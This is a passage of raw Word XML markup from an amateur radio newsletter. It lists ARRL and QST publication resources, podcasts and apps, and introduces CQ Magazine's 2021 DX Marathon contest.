    <w:p w14:paraId="6ACBBE09" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve">While you are at it, you might want to also request a free sample of </w:t>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:eastAsia="Georgia"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>CQ Amateur Radio</w:t>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve"> magazine by visiting- </w:t>
      </w:r>
      <w:hyperlink r:id="rId89">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:eastAsia="Georgia"/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>www.cq-amateur-radio.com/ cq_offer_new_ham.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B5593">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25465163" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96"/>
    <w:p w14:paraId="15AD0F05" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve">In addition to the </w:t>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:eastAsia="Georgia"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>On The Air Podcast</w:t>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId90">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:b/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Listen Now</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve">), you can also listen to other ARRL Podcasts (ARRL's </w:t>
      </w:r>
      <w:hyperlink r:id="rId91">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:eastAsia="Georgia"/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>Eclectic Tech Podcast</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B5593">
        <w:t>) and YouTube Videos (</w:t>
      </w:r>
      <w:hyperlink r:id="rId92">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:eastAsia="Georgia"/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>www.youtube.com/user/ARRLHQ</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B5593">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B25F44E" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96"/>
    <w:p w14:paraId="6A1A24BB" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Georgia"/>
          <w:i/>
          <w:color w:val="0000FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Back to the Publications, Digging Deeper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08001651" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96"/>
    <w:p w14:paraId="0664E8FC" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:r w:rsidRPr="002B5593">
        <w:t>In addition to the current issues, as a member of ARRL, you can utilize several features to access previous issues and additional resources</w:t>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:eastAsia="Georgia"/>
          <w:i/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684AD0EE" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve">ARRL Periodicals Archive and Search- </w:t>
      </w:r>
      <w:hyperlink r:id="rId93">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:eastAsia="Georgia"/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>www.arrl.org/arrl-periodicals-archive-search</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="193E1BF2" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve">QST Annual Indexes- </w:t>
      </w:r>
      <w:hyperlink r:id="rId94">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:eastAsia="Georgia"/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>www.arrl.org/qst-annual-indexes</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7EC2D273" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve">QST in Depth- Supplemental Information- </w:t>
      </w:r>
      <w:hyperlink r:id="rId95">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:eastAsia="Georgia"/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>www.arrl.org/qst-in-depth</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1310872E" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:t>QST Product Reviews- currently link is broken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1EBDDC" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve">Digital QST FAQ- </w:t>
      </w:r>
      <w:hyperlink r:id="rId96">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:eastAsia="Georgia"/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>www.arrl.org/digital-qst-faq</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="42668C12" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B5593">
        <w:t>QEXfiles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve">- Additional resources for QEX articles- </w:t>
      </w:r>
      <w:hyperlink r:id="rId97">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:eastAsia="Georgia"/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>www.arrl.org/qexfiles</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="73185EC9" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_eck3v5r909se" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">QST Android App- </w:t>
      </w:r>
      <w:hyperlink r:id="rId98">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Georgia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>Get the digital edition of QST on your Android device</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Georgia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://play.google.com/store/apps/details?id=com.branded.arrl&amp;hl=en" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="22" w:name="_ufcgplkp223" w:colFirst="0" w:colLast="0"/>
    <w:bookmarkEnd w:id="22"/>
    <w:p w14:paraId="08F93378" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">QST iOS App- </w:t>
      </w:r>
      <w:hyperlink r:id="rId99">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Georgia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>Get the digital edition of QST on your iPad, iPhone, or iPod touch</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Georgia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://itunes.apple.com/us/app/qst/id531766442?mt=8" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="23" w:name="_oi4t0ziffnfu" w:colFirst="0" w:colLast="0"/>
    <w:bookmarkEnd w:id="23"/>
    <w:p w14:paraId="5B382C2D" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>QST Kindle Fire App-</w:t>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="087FB2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId100">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Georgia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>Get the digital edition of QST on your Kindle Fire</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Georgia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1503B349" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve">QST Binary Files by Issue Date (1965-2010)- </w:t>
      </w:r>
      <w:hyperlink r:id="rId101">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:eastAsia="Georgia"/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>www.arrl.org/files/file/QST%20Binaries/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve"> (links for files in later versions of QST are directly accessible via the online version of QST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A01B170" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E00FF30" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>A Year-End Activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474AA4B0" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="252992512" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="50D85F69" wp14:editId="17D11E15">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2628900</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>171450</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4478497" cy="3471863"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides" distT="114300" distB="114300" distL="114300" distR="114300"/>
            <wp:docPr id="69" name="image10.png" descr="Text&#10;&#10;Description automatically generated"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="69" name="image10.png" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId102"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4478497" cy="3471863"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="159CBC05" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve">Many of us have both year-end and New Year’s traditions. One of my Amateur Radio year-end activities is entering </w:t>
      </w:r>
      <w:hyperlink r:id="rId103">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:eastAsia="Georgia"/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>CQ Magazine's Annual DX Marathon</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve">. The CQ Marathon is a different type of contest that runs all year, not just a single day or weekend. Competitors strive all year to work as many CQ Countries (similar to ARRL DXCC Entities list with a few additions) and all of the 40 CQ Zones. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E5DB9E" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96"/>
    <w:p w14:paraId="65270108" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96"/>
    <w:p w14:paraId="245F786F" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96"/>
    <w:p w14:paraId="7D9BFCB5" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96"/>
    <w:p w14:paraId="643AA968" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96"/>
    <w:p w14:paraId="3981EC26" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1155CC"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Quick Links:  </w:t>
      </w:r>
      <w:hyperlink r:id="rId104">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:b/>
            <w:i/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Online Log Submission</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId105">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:b/>
            <w:i/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>2021 Logs Received</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="252993536" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="4C7BC46D" wp14:editId="432B574C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>295275</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7105650" cy="1866900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="1" name="image12.png" descr="Text&#10;&#10;Description automatically generated"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="1" name="image12.png" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId106"/>
                    <a:srcRect b="73430"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7105650" cy="1866900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="484D40D3" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Comic Sans MS"/>
          <w:b/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:eastAsia="Comic Sans MS"/>
          <w:b/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>THE 2021 DX MARATHON IS NOW IN PROGRESS - GOOD LUCK!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BCC261" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="1155CC"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete contest rules for 2021 can be found </w:t>
      </w:r>
      <w:hyperlink r:id="rId107">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:b/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2279FA60" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="1155CC"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Submission information and the 2021 score sheet are available </w:t>
      </w:r>
      <w:hyperlink r:id="rId108">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:b/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3C87075F" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="1155CC"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
